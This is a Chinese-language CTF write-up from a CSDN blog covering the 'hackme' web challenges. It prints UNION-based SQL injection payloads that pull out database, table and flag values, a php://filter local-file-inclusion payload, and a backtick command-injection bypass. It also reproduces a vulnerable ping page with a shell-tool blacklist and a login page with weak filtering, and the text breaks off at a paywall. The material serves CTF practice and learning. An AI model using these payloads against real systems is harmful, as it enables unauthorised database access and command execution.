hackme(web wp)

最新推荐文章于 2024-05-12 22:33:24 发布
最新推荐文章于 2024-05-12 22:33:24 发布
阅读量4.2k 收藏 1
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaorouji/article/details/82461190
版权
oj说了不要直接给flag,所以就只写思路啦~hide and seek源码就有了Guestbook这题是SQL注入看数据库?mod=read&id=-1 union select 1,2,database(),4#然后就看到数据库是g8表?mod=read&id=-1 union select 1,2,(select table_name fr...
摘要由CSDN通过智能技术生成

oj说了不要直接给flag,所以就只写思路啦~

hide and seek

源码就有了

Guestbook

这题是SQL注入

看数据库

?mod=read&id=-1 union select 1,2,database(),4#

然后就看到数据库是g8

?mod=read&id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1),4#

看到flag表

字段

?mod=read&id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4#

看到flag字段

最后就看flag的值了

?mod=read&id=-1 union select 1,2,(select flag from flag limit 1,1),4#

LFI

题目已经提示了是php://filter伪协议,进入看到要访问flag文件

?page=php://filter/read=convert.base64-encode/resource=pages/flag

读出来一串base64,解密看到config

再去看下config

?page=php://filter/read=convert.base64-encode/resource=pages/config

解密一下就能看到flag了

homepage

看源码,有个flag,但却是第一题的,再找,看到cute.js,继续看看,看到一堆aaencode,解密得到一个二维码,扫一扫就有flag了

ping

源码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Ping</title>
</head>
<body>
    <form action="." method="GET">
        IP: <input type="text" name="ip"> <input type="submit" value="Ping">
    </form>
    <pre><?php
        $blacklist = [
            'flag', 'cat', 'nc', 'sh', 'cp', 'touch', 'mv', 'rm', 'ps', 'top', 'sleep', 'sed',
            'apt', 'yum', 'curl', 'wget', 'perl', 'python', 'zip', 'tar', 'php', 'ruby', 'kill',
            'passwd', 'shadow', 'root',
            'z',
            'dir', 'dd', 'df', 'du', 'free', 'tempfile', 'touch', 'tee', 'sha', 'x64', 'g',
            'xargs', 'PATH',
            '$0', 'proc',
            '/', '&', '|', '>', '<', ';', '"', '\'', '\\', "\n"
        ];

        set_time_limit(2);
        function ping($ip) {
            global $blacklist;
            if(strlen($ip) > 15) {
                return 'IP toooooo longgggggggggg';
            } else {
                foreach($blacklist as $keyword) {
                    if(strstr($ip, $keyword)) {
                        return "{$keyword} not allowed";
                    }
                }
                $ret = [];
                exec("ping -c 1 \"{$ip}\" 2>&1", $ret);
                return implode("\n", array_slice($ret, 0, 10));
            }
        }
        if(!empty($_GET['ip']))
            echo htmlentities(ping($_GET['ip']));
        else
            highlight_file(__FILE__);
    ?></pre>
</body>
</html>

看到有黑名单,过滤了很多东西,引号都过滤了,但是反引号没有过滤,试下?ip=`ls`

看到flag.php和index.php,但是cat又不能用,linux还有一个sort,能将文件进行排序输出,试下sort加通配符

?ip=`sort ????????`

然后就看到flag了

scoreboard

在网页找了一会没找到,最后终于在响应头找到flag了

login as admin 0

源码

<?php
require('config.php');
// table schema
// user -> id, user, password, is_admin
if($_GET['show_source'] === '1') {
    highlight_file(__FILE__);
    exit;
}
function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
        strstr($strl, 'update') || strstr($strl, 'delete')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}
$_POST = array_map(safe_filter, $_POST);
$user = null;
// connect to database
if(!empty($_POST['name']) && !empty($_POST['password'])) {
    $connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
    $db = new PDO($connection_string, DB_USER, DB_PASS);
    $sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
        $_POST['name'],
        $_POST['password']
    );
    try {
        $query = $db->query($sql);
        if($query) {
            $user = $query->fetchObject();
        } else {
            $user = false;
        }
    } catch(Exception $e) {
        $user = false;
    }
}
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>
    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>
    <div class="container">
        <div class="col-md-6 col-md-offset-3">
<?php if(!$user):
最低0.47元/天 解锁文章
Xi4or0uji
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
HACKME: 1实战演练
龙狼刺的博客
05-24 145
HACKME: 1
Hackme靶机渗透
m0_50584370的博客
06-01 225
hackme靶机渗透
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6172
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
hackme-1靶机渗透详解
大熊
06-12 441
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
看完这篇 教你玩转渗透测试靶机vulnhub——Hack Me Please 1_vlunhub hack_me_please(2)
最新发布
2401_84765537的博客
05-12 360
学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**
HACK ME靶机
qq_49101841的博客
10-01 1164
❀本篇关于信息安全实训时靶场训练的操作笔记。
攻防世界-hackme
qq_70851535的博客
11-19 307
逆向分析
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP
wpWeb服务编程案例
04-03
在Windows Phone(简称WP)平台上,开发者可以利用Web服务编程技术来创建强大的应用程序,与远程服务器进行数据交换,实现丰富的功能。本案例旨在探讨如何在Windows Phone设备上开发Web服务应用,通过集成Web服务,...
web-product-dark_WordPress_wp_
10-03
【标题】"web-product-dark_WordPress_wp_" 指的是一款专门为RevoSlider设计的WordPress主题,名为"web-product-dark"。RevoSlider是一个流行的WordPress滑块插件,用于创建吸引人的动态内容展示,如产品滑块、图像...
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
web-wp-API
02-21
Adonis API应用程序 这是在AdonisJs中创建API服务器的样板,它已预先配置。 人体分析仪 验证 CORS 清醒的ORM 迁移与种子 设置 使用adonis命令安装蓝图 adonis new yardstick --api-only 或手动克隆存储库,然后...
hackme 靶场复现
m0_68471358的博客
08-02 267
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透。
【靶机渗透】HACKME: 1
安全狐
07-19 900
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
Hackme_1靶机渗透 (新手推荐)主要考点SQL注入,文件上传
m0_64429364的博客
09-19 265
hackme_1详细解释
hackme-1打靶记录
wwd180的博客
06-12 96
实验主机:hackme-1靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限。
靶机通关 | hackme.ova靶机通关秘籍~
鱼溯的博客
10-19 166
靶场通关 | hackme.ova靶机通关秘籍~
VulnHub-hackme:1漏洞利用流程
2301_76786857的博客
06-13 225
靶机地址靶机IP:192.168.245.131测试机系统:kali、win10测试机IP:192.168.245.1291.下载并导入靶机打开vmware——文件—打开—hackme.ova—导入虚拟机2.查看网络适配器将靶机网络适配器改为NAT模式3.启动靶机点击 ▶靶机,开启成功。
红队打靶练习:HACKME: 1
分享
12-18 435
红队打靶练习:HACKME: 1 , 犹如猛虎撕咬般的恐惧感.....
CTFHub 平台Web挑战解题分析
"ctfhub平台上的Web挑战解题思路,包括备份文件、vim缓存、.DS_Store、git和stash的利用,以及hg版本控制系统的利用来获取flag。" 在网络安全竞赛(CTF,Capture The Flag)中,Web部分常常涉及到对网站源码、配置...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值